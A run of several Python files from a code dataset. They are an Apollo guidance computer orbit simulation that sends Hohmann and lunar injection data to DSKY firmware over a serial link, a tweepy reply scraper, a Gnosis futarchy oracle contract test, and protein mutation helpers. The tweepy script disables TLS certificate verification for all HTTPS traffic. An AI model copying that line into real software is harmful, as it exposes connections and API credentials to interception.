str_in = str_bytes.replace(\"\\x00\", \"\")\r\n str_in = str_in.split(\" \")\r\n res_0 = int(str_in[0])\r\n res_1 = int(str_in[1])\r\n res_2 = int(str_in[2])\r\n res_3 = int(str_in[3])\r\n verb = int(str_in[4])\r\n dsky_prog = int(str_in[5])\r\n except:\r\n print(\"Error in decoding\")\r\n continue\r\n # print(\r\n # \"Lunar: {} {} {} {} {}\".format(\r\n # set_lunar_inject,\r\n # set_delta_vc1,\r\n # set_lunar_inject_vb,\r\n # set_lunar_inject_va,\r\n # acm,\r\n # )\r\n # )\r\n # print(\r\n # \"Got: {:.5f} {:.5f} {:.5f} {:.5f}\".format(\r\n # float(res_0) / SPSCALE,\r\n # float(res_1) / SPSCALE,\r\n # float(res_2) / SPSCALE,\r\n # float(res_3) / SPSCALE,\r\n # )\r\n # )\r\n if verb == 39 and set_flags:\r\n\r\n if dsky_prog == 0 and do_lunar_injection == False:\r\n # Escape velocity\r\n target_vc1 = float(res_0) / SPSCALE * SIMAGCSCALE\r\n target_vc2 = 0.0\r\n acm = 0\r\n set_homann_transfer = True\r\n set_delta_vc1 = True\r\n set_flags = False\r\n elif dsky_prog == 1 and do_lunar_injection == False:\r\n # Homann Transfer\r\n target_vc1 = float(res_1 - res_0) / SPSCALE * SIMAGCSCALE\r\n target_vc2 = float(res_2 - res_3) / SPSCALE * SIMAGCSCALE\r\n acm = np.pi\r\n set_homann_transfer = True\r\n set_delta_vc1 = True\r\n set_flags = False\r\n elif dsky_prog == 2 and do_lunar_injection:\r\n if dsky_prog != past_prog:\r\n set_lunar_injection()\r\n # print(\"Read first lunar inject\")\r\n # Lunar Injection Initial Velocity Calculation\r\n target_vc1 = float(res_1) / SPSCALE * SIMAGCSCALE\r\n set_lunar_inject_va = True\r\n elif dsky_prog == 3 and do_lunar_injection:\r\n # print(\"Read second lunar inject\")\r\n if dsky_prog != past_prog:\r\n set_lunar_injection()\r\n # Lunar Injection Final Velocity Calculation\r\n target_vc1 = float(res_1) / SPSCALE * SIMAGCSCALE\r\n target_vc2l = float(res_2) / SPSCALE * SIMAGCSCALE\r\n target_vc2p = float(res_3) / SPSCALE * SIMAGCSCALE\r\n set_lunar_inject_vb = set_lunar_inject_va\r\n # set_lunar_injection()\r\n # set_flags = False\r\n elif dsky_prog == 4 and do_lunar_injection:\r\n counter = counter + 1\r\n if dsky_prog != past_prog:\r\n set_lunar_injection()\r\n if counter 
> 5:\r\n # print(\"Read final lunar inject\")\r\n # Lunar Injection Angle Calculation\r\n target_vc1 = float(res_1) / SPSCALE * SIMAGCSCALE\r\n target_vc2l = float(res_2) / SPSCALE * SIMAGCSCALE\r\n target_vc2p = float(res_3) / SPSCALE * SIMAGCSCALE\r\n acm = np.pi * float(res_0) / SPSCALE\r\n set_lunar_inject = set_lunar_inject_vb\r\n set_delta_vc1 = set_lunar_inject_vb\r\n set_lunar_inject_vb = False\r\n set_lunar_inject_va = False\r\n set_flags = False\r\n # print(\r\n # \"AGC PROGRAM {}: VC1={:.5f} VC2={:.5f} ACM={:.5f}\".format(\r\n # dsky_prog, target_vc1, target_vc2, acm\r\n # )\r\n # )\r\n\r\n tconn.set_text(r\"Connected\")\r\n tconn.set_color(\"springgreen\")\r\n\r\n past_prog = dsky_prog\r\n sleep(0.1)\r\n\r\n\r\nbtConn = serial\r\nprint(\"Creating Bluetooth SPP connection\")\r\ntry:\r\n btConn = serial.Serial(\"/dev/ttyS7\", 115200, timeout=10)\r\nexcept:\r\n print(\"Not connected\")\r\n tconn.set_text(r\"Disconnected\")\r\n tconn.set_color(\"red\")\r\nbtConn.flushInput()\r\n# sio = io.TextIOWrapper(io.BufferedRWPair(btConn, btConn, 1), encoding=\"utf-8\")\r\nserial_thread = th.Thread(target=spplistener, args=())\r\n\r\nserial_thread.start()\r\n\r\n\r\ndef set_orbits(event):\r\n global r\r\n global v\r\n global rm\r\n global vm\r\n global line1\r\n global line2\r\n global offset\r\n global reset\r\n anim.pause()\r\n ri = [sradius.val, 0]\r\n v_i_abs = np.sqrt(Mp * GG / ri[0])\r\n vm_i_abs = np.sqrt(Mp * GG / (rm_i[0]))\r\n # Initialization\r\n vi = [0, v_i_abs * 1.0]\r\n vmi = [0, vm_i_abs * 1.0]\r\n r = np.zeros([N, 2])\r\n v = np.zeros([N, 2])\r\n rm = np.zeros([N, 2])\r\n vm = np.zeros([N, 2])\r\n r[0, :] = ri\r\n v[0, :] = vi\r\n rm[0, :] = rm_i\r\n vm[0, :] = vmi\r\n offset = index + 1\r\n reset = True\r\n line1.set_color(\"#FDB813\")\r\n anim.resume()\r\n\r\n\r\ndef reset(event):\r\n set_orbits(event)\r\n\r\n\r\ndef homannn_transfer(event):\r\n global target_r2\r\n global theta1\r\n global theta2\r\n global delta_vc1\r\n global delta_vc2\r\n global acm\r\n global set_delta_vc1\r\n # current_dr = np.subtract(current_rm, current_rc)\r\n r1 = np.linalg.norm(current_rc)\r\n target_r2 = r2 = np.linalg.norm(current_rm)\r\n theta1 = arctan(current_rc)\r\n theta2 = arctan(current_rm)\r\n delta_vc1 = np.sqrt(GG * Mp / r1) * (np.sqrt(2.0 * r2 / (r1 + r2)) - 1.0)\r\n delta_vc2 = np.sqrt(GG * Mp / r2) * (-1.0 * np.sqrt(2.0 * r1 / (r1 + r2)) + 1.0)\r\n acm = np.pi * (1 - np.sqrt((r1 / r2 + 1) ** 3 / 8.0))\r\n print(\r\n \"R1:{:.5f} R2:{:.5f} Delta-V: {:.5f} then {:.5f} at {:.5f} rad\\n\".format(\r\n r1, target_r2, delta_vc1, delta_vc2, acm\r\n )\r\n )\r\n\r\n GGMp = GG * Mp / 10.0\r\n GGMl = GG * Ml / 10.0\r\n rr0 = 1.0 / (sfinalrad.val * 10.0)\r\n rr1 = 1.0 / (r1 * 10.0)\r\n rr2 = 1.0 / (r2 * 10.0)\r\n rr3 = 1.0 / (10.0 * (r1 + target_r2) / 2.0)\r\n va_sqr_2 = GGMp * rr1\r\n vb_sqr_2 = GGMp * rr2\r\n vatx_sqr = GGMp * (2 * rr1 - rr3)\r\n vbtx_sqr = GGMp * (2 * rr2 - rr3)\r\n\r\n print(\r\n \"GMp:{:.5f} 1/R1N:{:.5f} 1/R2N:{:.5f} ATX:{:.5f}\\nVa:{:.5f}({:.5f}) Vb:{:.5f}({:.5f}) Vatx:{:.5f}({:.5f}) Vbtx:{:.5f}({:.5f}) V-delta:{:.10f} -> {:.10f}\\n\".format(\r\n GGMp,\r\n rr1,\r\n rr2,\r\n rr3,\r\n va_sqr_2,\r\n np.sqrt(va_sqr_2),\r\n vb_sqr_2,\r\n np.sqrt(vb_sqr_2),\r\n vatx_sqr,\r\n np.sqrt(vatx_sqr),\r\n vbtx_sqr,\r\n np.sqrt(vbtx_sqr),\r\n np.sqrt(vatx_sqr) - np.sqrt(va_sqr_2),\r\n np.sqrt(vb_sqr_2) - np.sqrt(vbtx_sqr),\r\n )\r\n )\r\n print(\r\n \"Vbtx_L:{:.5f}({:.5f}) Vbtx_M:{:.5f}({:.5f}) arg:{:.5f}({:.5f},{:.5f})\\n\".format(\r\n np.sqrt(GGMp * rr0),\r\n GGMp * rr0,\r\n 
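# A minimal standalone sketch of the vis-viva based Hohmann math that
# homannn_transfer() computes above, assuming mu = GG * Mp (the standard
# gravitational parameter) and circular, coplanar orbits of radii r1 and r2.
import numpy as np

def hohmann_burns(mu, r1, r2):
    """Return (delta_v1, delta_v2, phase_angle) for an r1 -> r2 transfer."""
    a_tx = (r1 + r2) / 2.0                               # transfer semi-major axis
    dv1 = np.sqrt(mu / r1) * (np.sqrt(r2 / a_tx) - 1.0)  # injection burn
    dv2 = np.sqrt(mu / r2) * (1.0 - np.sqrt(r1 / a_tx))  # circularisation burn
    # Lead angle of the target at injection, same form as `acm` above:
    phase = np.pi * (1.0 - np.sqrt(((r1 / r2 + 1.0) / 2.0) ** 3))
    return dv1, dv2, phase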
np.sqrt(GGMp * rr2),\r\n GGMp * rr2,\r\n 1.0 - np.sqrt(((r1 / r2) / 2.0 + 1.0 / 2.0) ** 3),\r\n ((r1 / r2) / 2.0 + 1.0 / 2.0) ** 3,\r\n ((r1 / r2) / 2.0 + 1.0 / 2.0),\r\n )\r\n )\r\n # print(\"GMp:{:.3f} 1/R1N:{:.3f} 1/R2N:{:.3f} ATX:{:.3f}\\nVa:{:.3f}({:.3f}) Vb:{:.3f}({:.3f}) Vatx:{:.3f}({:.3f}) Vbtx:{:.3f}({:.3f}) V-delta:{:.3f} -> {:.3f}\\n\"\\\r\n # .format(GGMp*(2**14), rr1*(2**14), rr2*(2**14), rr3*(2**14), va_sqr_2*(2**14), np.sqrt(va_sqr_2)*(2**14), vb_sqr_2*(2**14), np.sqrt(vb_sqr_2)*(2**14), vatx_sqr*(2**14), \\\r\n # np.sqrt(vatx_sqr)*(2**14), vbtx_sqr*(2**14), np.sqrt(vbtx_sqr)*(2**14), (np.sqrt(vatx_sqr)-np.sqrt(va_sqr_2))*(2**14), (np.sqrt(vb_sqr_2)-np.sqrt(vbtx_sqr))*(2**14)))\r\n # print(\"GMp: {} 1/R1N: {} 1/R2N: {} ATX: {}\\nVa: {}({}) Vb: {}({}) Vatx: {}({}) Vbtx: {}({}) V-delta: {} -> {}\\n\"\\\r\n # .format(int(np.round(GGMp*(2**14))), int(np.round(rr1*(2**14))), int(np.round(rr2*(2**14))), int(np.round(rr3*(2**14))), int(np.round(va_sqr_2*(2**14))), int(np.round(np.sqrt(va_sqr_2)*(2**14))),\\\r\n # int(np.round(vb_sqr_2*(2**14))), int(np.round(np.sqrt(vb_sqr_2)*(2**14))), int(np.round(vatx_sqr*(2**14))), int(np.round(np.sqrt(vatx_sqr)*(2**14))), int(np.round(vbtx_sqr*(2**14))), \\\r\n # int(np.round(np.sqrt(vbtx_sqr)*(2**14))), int(np.round((np.sqrt(vatx_sqr)-np.sqrt(va_sqr_2))*(2**14))), int(np.round((np.sqrt(vb_sqr_2)-np.sqrt(vbtx_sqr))*(2**14)))))\r\n print(\r\n \"<+{:05o}+{:05o}+{:05o}+{:05o} 10 10 10 123 1234>\\n\".format(\r\n int(np.round(GGMp * (2**14))),\r\n int(np.round(rr1 * (2**14))),\r\n int(np.round(rr2 * (2**14))),\r\n int(np.round(rr3 * (2**14))),\r\n )\r\n )\r\n\r\n print(\r\n \"<+{:05f}+{:05f}+{:05f}+{:05f} 10 10 10 123 1234>\".format(\r\n (GGMp),\r\n (rr0),\r\n (rr2),\r\n (GGMl),\r\n )\r\n )\r\n print(\r\n \"<+{:05o}+{:05o}+{:05o}+{:05o} 10 10 10 123 1234>\".format(\r\n int(np.round(GGMp * (2**14))),\r\n int(np.round(rr0 * (2**14))),\r\n int(np.round(rr2 * (2**14))),\r\n int(np.round(GGMl * (2**14))),\r\n )\r\n )\r\n print(\r\n \"Vm={:05d} Vp={:05d} V-d={:.5f}\".format(\r\n int(np.round(np.sqrt(GGMl * rr0) * (2**14))),\r\n int(np.round(np.sqrt(GGMp * rr2) * (2**14))),\r\n (np.sqrt(GGMp * rr0 + GGMp * rr2) - np.sqrt(vbtx_sqr)),\r\n )\r\n )\r\n print(\r\n \"GGMl={:5f} Vm={:5f} Vp={:5f} V-final={:.5f}\\n\".format(\r\n (GGMl),\r\n (np.sqrt(GGMl * rr0)),\r\n (np.sqrt(GGMp * rr2)),\r\n (np.sqrt(GGMp * rr0 + GGMp * rr2)),\r\n )\r\n )\r\n\r\n print(\r\n \"<+{:05f}+{:05f}+{:05f}+{:05f} 10 10 1 123 1234>\".format(\r\n (r1 / r2),\r\n (0),\r\n (0),\r\n (0),\r\n )\r\n )\r\n print(\r\n \"<+{:05o}+{:05o}+{:05o}+{:05o} 10 10 1 123 1234>\".format(\r\n int(np.round(r1 / r2 * (2**14))),\r\n int(np.round(r1 / r2 * (2**14))),\r\n int(np.round(r1 / r2 * (2**14))),\r\n int(np.round(r1 / r2 * (2**14))),\r\n )\r\n )\r\n print(\r\n \"result octal={:05o} result bef sqrt={:5f} result bef. 
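# The "<+xxxxx+xxxxx+xxxxx+xxxxx ...>" frames printed above encode each value
# as an AGC-style single-precision fraction: multiply by 2**14, round, and
# render as a zero-padded 5-digit octal field. A hedged helper (the trailing
# "10 10 1 123 1234" fields look like fixed verb/noun metadata for this
# firmware, so they are passed through verbatim; non-negative inputs assumed):
def agc_frame(a, b, c, d, tail="10 10 1 123 1234"):
    words = "".join("+{:05o}".format(int(round(x * 2 ** 14))) for x in (a, b, c, d))
    return "<{} {}>".format(words, tail)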
minus={:.5f} result={:.5f}\".format(\r\n int(np.round((1 - np.sqrt((r1 / r2 + 1) ** 3 / 8.0)) * (2**14))),\r\n (r1 / r2) / 2 + 1 / 2,\r\n np.sqrt((r1 / r2 + 1) ** 3 / 8.0),\r\n 1 - np.sqrt((r1 / r2 + 1) ** 3 / 8.0),\r\n )\r\n )\r\n\r\n set_delta_vc1 = True\r\n\r\n\r\n# p.start()\r\n\r\n\r\ndef set_lunar_injection():\r\n global past_prog\r\n global set_lunar_inject\r\n global set_lunar_inject_va\r\n global set_lunar_inject_vb\r\n global btConn\r\n global set_flags\r\n\r\n r1 = np.linalg.norm(current_rc)\r\n target_r2 = r2 = np.linalg.norm(current_rm)\r\n\r\n if r1 == 0.0 or r2 == 0.0:\r\n return\r\n\r\n GGMp = GG * Mp / SIMAGCSCALE\r\n GGMl = GG * Ml / SIMAGCSCALE\r\n rr0 = 1.0 / (sfinalrad.val * SIMAGCSCALE)\r\n rr1 = 1.0 / (r1 * SIMAGCSCALE)\r\n rr2 = 1.0 / (r2 * SIMAGCSCALE)\r\n rr3 = 1.0 / (SIMAGCSCALE * (r1 + target_r2) / 2.0) # Apogee\r\n\r\n if (\r\n not set_lunar_inject\r\n and not set_lunar_inject_va\r\n and not set_lunar_inject_vb\r\n and past_prog != 4\r\n ):\r\n # print(\"Wrote first lunar inject\")\r\n ss = btConn.write(\r\n \"<+{:05o}+{:05o}+{:05o}+{:05o} 10 10 1 123 1234>\\n\".format(\r\n int(np.round(GGMp * (2**14))),\r\n int(np.round(rr1 * (2**14))),\r\n int(np.round(rr2 * (2**14))),\r\n int(np.round(rr3 * (2**14))),\r\n ).encode()\r\n )\r\n elif set_lunar_inject_va and not set_lunar_inject and not set_lunar_inject_vb:\r\n # print(\"Wrote second lunar inject\")\r\n ss = btConn.write(\r\n \"<+{:05o}+{:05o}+{:05o}+{:05o} 10 10 1 123 1234>\\n\".format(\r\n int(np.round(GGMp * (2**14))),\r\n int(np.round(rr0 * (2**14))),\r\n int(np.round(rr2 * (2**14))),\r\n int(np.round(GGMl * (2**14))),\r\n ).encode()\r\n )\r\n elif set_lunar_inject_vb and set_lunar_inject_va and not set_lunar_inject:\r\n # print(\"Wrote third lunar inject\")\r\n ss = btConn.write(\r\n \"<+{:05o}+{:05o}+{:05o}+{:05o} 10 10 1 123 1234>\\n\".format(\r\n int(np.round(r1 / r2 * (2**14))),\r\n int(np.round(r1 / r2 * (2**14))),\r\n int(np.round(r1 / r2 * (2**14))),\r\n int(np.round(r1 / r2 * (2**14))),\r\n ).encode()\r\n )\r\n # set_flags = True\r\n # set_lunar_inject = True\r\n\r\n\r\ndef send_lunar(event):\r\n global set_flags\r\n global set_lunar_inject\r\n global set_delta_vc1\r\n global set_lunar_inject_vb\r\n global set_lunar_inject_va\r\n global counter\r\n global do_lunar_injection\r\n do_lunar_injection = True\r\n counter = 0\r\n set_lunar_inject = False\r\n set_delta_vc1 = False\r\n set_lunar_inject_vb = False\r\n set_lunar_inject_va = False\r\n set_lunar_injection()\r\n set_flags = True\r\n\r\n\r\ndef send_hohmann(event):\r\n global btConn\r\n global set_flags\r\n global do_lunar_injection\r\n do_lunar_injection = False\r\n r1 = np.linalg.norm(current_rc)\r\n target_r2 = r2 = stransfrad.val\r\n\r\n if r1 == 0.0 or r2 == 0.0:\r\n return\r\n\r\n GGMp = GG * Mp / SIMAGCSCALE\r\n rr1 = 1.0 / (r1 * SIMAGCSCALE)\r\n rr2 = 1.0 / (r2 * SIMAGCSCALE)\r\n rr3 = 1.0 / (SIMAGCSCALE * (r1 + target_r2) / 2.0) # Apogee\r\n\r\n ss = btConn.write(\r\n \"<+{:05o}+{:05o}+{:05o}+{:05o} 10 10 1 123 1234>\\n\".format(\r\n int(np.round(GGMp * (2**14))),\r\n int(np.round(rr1 * (2**14))),\r\n int(np.round(rr2 * (2**14))),\r\n int(np.round(rr3 * (2**14))),\r\n ).encode()\r\n )\r\n print(\r\n \"<+{:05o}+{:05o}+{:05o}+{:05o} 10 10 1 123 1234>\\n\".format(\r\n int(np.round(GGMp * (2**14))),\r\n int(np.round(rr1 * (2**14))),\r\n int(np.round(rr2 * (2**14))),\r\n int(np.round(rr3 * (2**14))),\r\n )\r\n )\r\n set_flags = True\r\n\r\n # target_r2 = r2 = 5\r\n # va_sqr_2 = GGMp * rr1\r\n # vb_sqr_2 = GGMp * rr2\r\n # vatx_sqr = GGMp * (2 
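# Hedged sketch of the request/response cycle this script runs against the
# DSKY firmware: write one framed packet, then read back six space-separated
# integer fields (four 2**14-scaled results plus verb and program), exactly
# as spplistener() decodes them. Port and baud follow the values used above;
# the function name is hypothetical.
import serial

def dsky_roundtrip(packet, port="/dev/ttyS7", baud=115200):
    with serial.Serial(port, baud, timeout=10) as conn:
        conn.write(packet.encode())
        raw = conn.readline().decode("utf-8").replace("\x00", "")
        return [int(f) for f in raw.split(" ")[:6]]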
* rr1 - rr3)\r\n # vbtx_sqr = GGMp * (2 * rr2 - rr3)\r\n # acm = np.pi * (1 - np.sqrt((r1 / r2 + 1) ** 3 / 8.0))\r\n # print(\r\n # \"Lunar R1:{:.5f} R2:{:.5f} Delta-V: {:.5f} then {:.5f} at {:.5f} rad\".format(\r\n # r1,\r\n # r2,\r\n # np.sqrt(vatx_sqr) * SIMAGCSCALE,\r\n # np.sqrt(vbtx_sqr) * SIMAGCSCALE,\r\n # acm,\r\n # )\r\n # )\r\n # target_r2 = r2 = stransfrad.val\r\n # va_sqr_2 = GGMp * rr1\r\n # vb_sqr_2 = GGMp * rr2\r\n # vatx_sqr = GGMp * (2 * rr1 - rr3)\r\n # vbtx_sqr = GGMp * (2 * rr2 - rr3)\r\n # acm = np.pi\r\n # print(\r\n # \"Hohmann R1:{:.5f} R2:{:.5f} Vatx: {:.5f} then Vbtx {:.5f} at {:.5f} rad\".format(\r\n # r1,\r\n # r2,\r\n # (np.sqrt(vatx_sqr) - np.sqrt(va_sqr_2)) * SIMAGCSCALE,\r\n # np.sqrt(vb_sqr_2) - np.sqrt(vbtx_sqr) * SIMAGCSCALE,\r\n # acm,\r\n # )\r\n # )\r\n\r\n # delta_vc1 = np.sqrt(GG * Mp / r1) * (np.sqrt(2.0 * r2 / (r1 + r2)) - 1.0)\r\n # delta_vc2 = np.sqrt(GG * Mp / r2) * (-1.0 * np.sqrt(2.0 * r1 / (r1 + r2)) + 1.0)\r\n # acm = np.pi * (1 - np.sqrt((r1 / r2 + 1) ** 3 / 8.0))\r\n # print(\r\n # \"R1:{:.5f} R2:{:.5f} Delta-V: {:.5f} then {:.5f} at {:.5f} rad\\n\".format(\r\n # r1, target_r2, delta_vc1, delta_vc2, acm\r\n # )\r\n # )\r\n\r\n\r\nresetax = py.axes([0.78, 0.37, 0.07, 0.04])\r\nbuttonrst = Button(resetax, \"Reset\", hovercolor=\"gray\", color=\"black\")\r\nbuttonrst.on_clicked(reset)\r\n\r\nsetax = py.axes([0.70, 0.37, 0.07, 0.04])\r\nbuttonsethohm = Button(setax, \"Hohmann\", hovercolor=\"gray\", color=\"black\")\r\nbuttonsethohm.on_clicked(send_hohmann)\r\n\r\nsetax = py.axes([0.62, 0.37, 0.07, 0.04])\r\nbuttonsetlunar = Button(setax, \"Lunar Inject\", hovercolor=\"gray\", color=\"black\")\r\nbuttonsetlunar.on_clicked(send_lunar)\r\n\r\n\r\nsradius.on_changed(set_orbits)\r\n\r\nrax = py.axes([0.60, 0.65, 0.3, 0.2], facecolor=\"#1a1a1a\")\r\nradio = RadioButtons(\r\n rax,\r\n (\"Luna - Earth\", \"Phobos - Mars\", \"Europa - Jupiter\", \"Titan - Saturn\"),\r\n active=0,\r\n activecolor=\"white\",\r\n)\r\n\r\nfig.set_dpi(156)\r\n\r\npy.show()\r\n","repo_name":"Absolute0K/DSKY-firmware","sub_path":"AGC Simulation.py","file_name":"AGC Simulation.py","file_ext":"py","file_size_in_byte":29502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"29191466426","text":"import csv\nimport tweepy\nimport ssl\n\nssl._create_default_https_context = ssl._create_unverified_context\n\n# Oauth keys\nconsumer_key = \"XXX\"\nconsumer_secret = \"XXX\"\naccess_token = \"XXX\"\naccess_token_secret = \"XXX\"\n\n# Authentication with Twitter\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\nauth.set_access_token(access_token, access_token_secret)\napi = tweepy.API(auth)\n\n# update these for the tweet you want to process replies to 'name' = the account username and you can find the tweet id within the tweet URL\nname = 'LunarCRUSH'\ntweet_id = '1270923526690664448'\n\nreplies=[]\nfor tweet in tweepy.Cursor(api.search,q='to:'+name, result_type='recent', timeout=999999).items(1000):\n if hasattr(tweet, 'in_reply_to_status_id_str'):\n if (tweet.in_reply_to_status_id_str==tweet_id):\n replies.append(tweet)\n\nwith open('replies_clean.csv', 'w') as f:\n csv_writer = csv.DictWriter(f, fieldnames=('user', 'text'))\n csv_writer.writeheader()\n for tweet in replies:\n row = {'user': tweet.user.screen_name, 'text': tweet.text.replace('\\n', ' ')}\n 
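# Two caveats for the reply scraper above, kept as a commented sketch since
# exact behaviour depends on the Twitter API tier: the standard search
# endpoint only reaches back roughly seven days, so replies to older tweets
# are silently missed, and q='to:' is a broad filter that the
# in_reply_to_status_id_str comparison then narrows to the target tweet.
# Passing wait_on_rate_limit=True lets long crawls sleep through rate limits:
# api = tweepy.API(auth, wait_on_rate_limit=True)
# for tweet in tweepy.Cursor(api.search, q='to:' + name, since_id=tweet_id,
#                            tweet_mode='extended').items():
#     if tweet.in_reply_to_status_id_str == tweet_id:
#         replies.append(tweet)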
csv_writer.writerow(row)\n","repo_name":"nirholas/Get-Tweet-Replies-With-Python-Tweepy","sub_path":"twitter_reply.py","file_name":"twitter_reply.py","file_ext":"py","file_size_in_byte":1114,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"35"} +{"seq_id":"12933117179","text":"from ..abstract_test import AbstractTestContract, accounts, keys, TransactionFailed\nfrom ethereum import tester as t\n\n\nclass TestContract(AbstractTestContract):\n \"\"\"\n run test with python -m unittest contracts.tests.oracles.test_futarchy_oracle\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n super(TestContract, self).__init__(*args, **kwargs)\n self.math = self.create_contract('Utils/Math.sol')\n self.event_factory = self.create_contract('Events/EventFactory.sol', libraries={'Math': self.math})\n self.centralized_oracle_factory = self.create_contract('Oracles/CentralizedOracleFactory.sol')\n self.market_factory = self.create_contract('Markets/DefaultMarketFactory.sol')\n self.futarchy_factory = self.create_contract('Oracles/FutarchyOracleFactory.sol', params=[self.event_factory])\n self.lmsr = self.create_contract('MarketMakers/LMSRMarketMaker.sol', libraries={'Math': self.math})\n self.ether_token = self.create_contract('Tokens/EtherToken.sol', libraries={'Math': self.math})\n self.token_abi = self.create_abi('Tokens/AbstractToken.sol')\n self.market_abi = self.create_abi('Markets/DefaultMarket.sol')\n self.event_abi = self.create_abi('Events/AbstractEvent.sol')\n self.oracle_abi = self.create_abi('Oracles/CentralizedOracle.sol')\n self.futarchy_abi = self.create_abi('Oracles/FutarchyOracle.sol')\n\n def test(self):\n t.gas_limit = 4712388*4 # Creation gas costs are above gas limit!!!\n # Create futarchy oracle\n description_hash = \"d621d969951b20c5cf2008cbfc282a2d496ddfe75a76afe7b6b32f1470b8a449\".decode('hex')\n oracle = self.contract_at(self.centralized_oracle_factory.createCentralizedOracle(description_hash), self.oracle_abi)\n fee = 50000 # 5%\n lower = -100\n upper = 100\n deadline = self.s.block.timestamp + 60*60 # in 1h\n creator = 0\n profiling = self.futarchy_factory.createFutarchyOracle(self.ether_token.address, oracle.address, 2, lower, upper,\n self.market_factory.address, self.lmsr.address, fee,\n deadline, sender=keys[creator], profiling=True)\n self.assertLess(profiling['gas'], 10000000)\n futarchy = self.contract_at(profiling['output'], self.futarchy_abi)\n categorical_event = self.contract_at(futarchy.categoricalEvent(), self.event_abi)\n # Fund markets\n collateral_token_count = 10**18\n self.ether_token.deposit(value=collateral_token_count, sender=keys[creator])\n self.assertEqual(self.ether_token.balanceOf(accounts[creator]), collateral_token_count)\n self.ether_token.approve(futarchy.address, collateral_token_count, sender=keys[creator])\n futarchy.fund(collateral_token_count, sender=keys[creator])\n # Buy into market for outcome token 1\n market = self.contract_at(futarchy.markets(1), self.market_abi)\n buyer = 1\n outcome = 0\n token_count = 10 ** 15\n outcome_token_costs = self.lmsr.calcCosts(market.address, outcome, token_count)\n fee = market.calcMarketFee(outcome_token_costs)\n costs = outcome_token_costs + fee\n # Buy all outcomes\n self.ether_token.deposit(value=costs, sender=keys[buyer])\n self.ether_token.approve(categorical_event.address, costs, sender=keys[buyer])\n categorical_event.buyAllOutcomes(costs, sender=keys[buyer])\n collateral_token = self.contract_at(categorical_event.outcomeTokens(1), self.token_abi)\n 
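# The funding and buying steps in this test follow the usual two-phase ERC20
# pattern: deposit() wraps ether into the token, approve() grants the target
# contract an allowance for the exact amount, and only then can that contract
# pull the tokens (presumably via transferFrom) when fund(), buyAllOutcomes()
# or buy() run. Skipping an approve() is the classic cause of a failed fund().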
collateral_token.approve(market.address, costs, sender=keys[buyer])\n self.assertEqual(market.buy(outcome, token_count, costs, sender=keys[buyer]), costs)\n # Set outcome of futarchy oracle\n self.assertRaises(TransactionFailed, futarchy.setOutcome)\n self.s.block.timestamp = deadline\n futarchy.setOutcome()\n self.assertTrue(futarchy.isOutcomeSet())\n self.assertEqual(futarchy.getOutcome(), 1)\n categorical_event.setWinningOutcome()\n # Set winning outcome for scalar events\n self.assertRaises(TransactionFailed, futarchy.close)\n oracle.setOutcome(50)\n scalar_event = self.contract_at(market.eventContract(), self.event_abi)\n scalar_event.setWinningOutcome()\n # Close winning market and transfer collateral tokens to creator\n futarchy.close(sender=keys[creator])\n self.assertGreater(self.ether_token.balanceOf(accounts[creator]), collateral_token_count)\n","repo_name":"SachGupta/gnosis-contracts","sub_path":"contracts/tests/oracles/test_futarchy_oracle.py","file_name":"test_futarchy_oracle.py","file_ext":"py","file_size_in_byte":4581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"5224782299","text":"from typing import List, Tuple\nimport re\nfrom itertools import product, zip_longest\nimport pandas as pd\nimport numpy as np\n\n_FASTA_VOCAB = \"ARNDCQEGHILKMFPSTWYV\"\n\n\ndef single_mutant_names(sequence: str) -> List[str]:\n \"\"\"Returns the names of all single mutants of a sequence.\"\"\"\n mutants = []\n for (i, wt), mut in product(enumerate(sequence), _FASTA_VOCAB):\n if wt == mut:\n continue\n mutant = f\"{wt}{i + 1}{mut}\"\n mutants.append(mutant)\n return mutants\n\n\ndef split_mutant_name(mutant: str) -> Tuple[str, int, str]:\n \"\"\"Splits a mutant name into the wildtype, position, and mutant.\"\"\"\n return mutant[0], int(mutant[1:-1]), mutant[-1]\n\n\ndef make_mutation(sequence: str, mutant: str, start_ind: int = 1) -> str:\n \"\"\"Makes a mutation on a particular sequence. 
Multiple mutations may be separated\n by ',', ':', or '+', characters.\n \"\"\"\n delimiters = [\",\", r\"\\+\", \":\"]\n expression = re.compile(\"|\".join(delimiters))\n if mutant.upper() == \"WT\":\n return sequence\n if expression.search(mutant):\n mutants = expression.split(mutant)\n for mutant in mutants:\n sequence = make_mutation(sequence, mutant)\n return sequence\n else:\n wt, pos, mut = split_mutant_name(mutant)\n assert sequence[pos - start_ind] == wt\n return sequence[: pos - start_ind] + mut + sequence[pos - start_ind + 1 :]\n\n\ndef create_mutant_df(sequence: str) -> pd.DataFrame:\n \"\"\"Create a dataframe with mutant names and sequences\"\"\"\n names = [\"WT\"] + single_mutant_names(sequence)\n sequences = [sequence] + [make_mutation(sequence, mut) for mut in names[1:]]\n return pd.DataFrame({\"mutant\": names, \"sequence\": sequences})\n\n\ndef seqdiff(seq1: str, seq2: str) -> str:\n diff = []\n for aa1, aa2 in zip_longest(seq1, seq2, fillvalue=\"-\"):\n if aa1 == aa2:\n diff.append(\" \")\n else:\n diff.append(\"|\")\n out = f\"{seq1}\\n{''.join(diff)}\\n{seq2}\"\n return out\n\n\ndef to_pivoted_mutant_df(df: pd.DataFrame) -> pd.DataFrame:\n df[\"wt_aa\"] = df[\"mutant\"].str.get(0)\n df[\"mut_aa\"] = df[\"mutant\"].str.get(-1)\n df[\"Position\"] = df[\"mutant\"].str.slice(1, -1).astype(int)\n df = df.drop(columns=\"mutant\").pivot(\n index=\"mut_aa\", columns=[\"Position\", \"wt_aa\"]\n )\n df = df.loc[list(_FASTA_VOCAB)]\n return df\n\n\ndef pivoted_mutant_df(sequence: str, scores: np.ndarray) -> pd.DataFrame:\n index = pd.Index(list(_FASTA_VOCAB), name=\"mut_aa\")\n columns = pd.MultiIndex.from_arrays(\n [list(range(1, len(sequence) + 1)), list(sequence)], names=[\"Position\", \"wt_aa\"]\n )\n df = pd.DataFrame(\n data=scores,\n index=index,\n columns=columns,\n )\n return df\n","repo_name":"yikunpku/RNA-MSM","sub_path":"utils/sequence.py","file_name":"sequence.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"35"} +{"seq_id":"15412799535","text":"import logging\nfrom sys import stdout\nimport 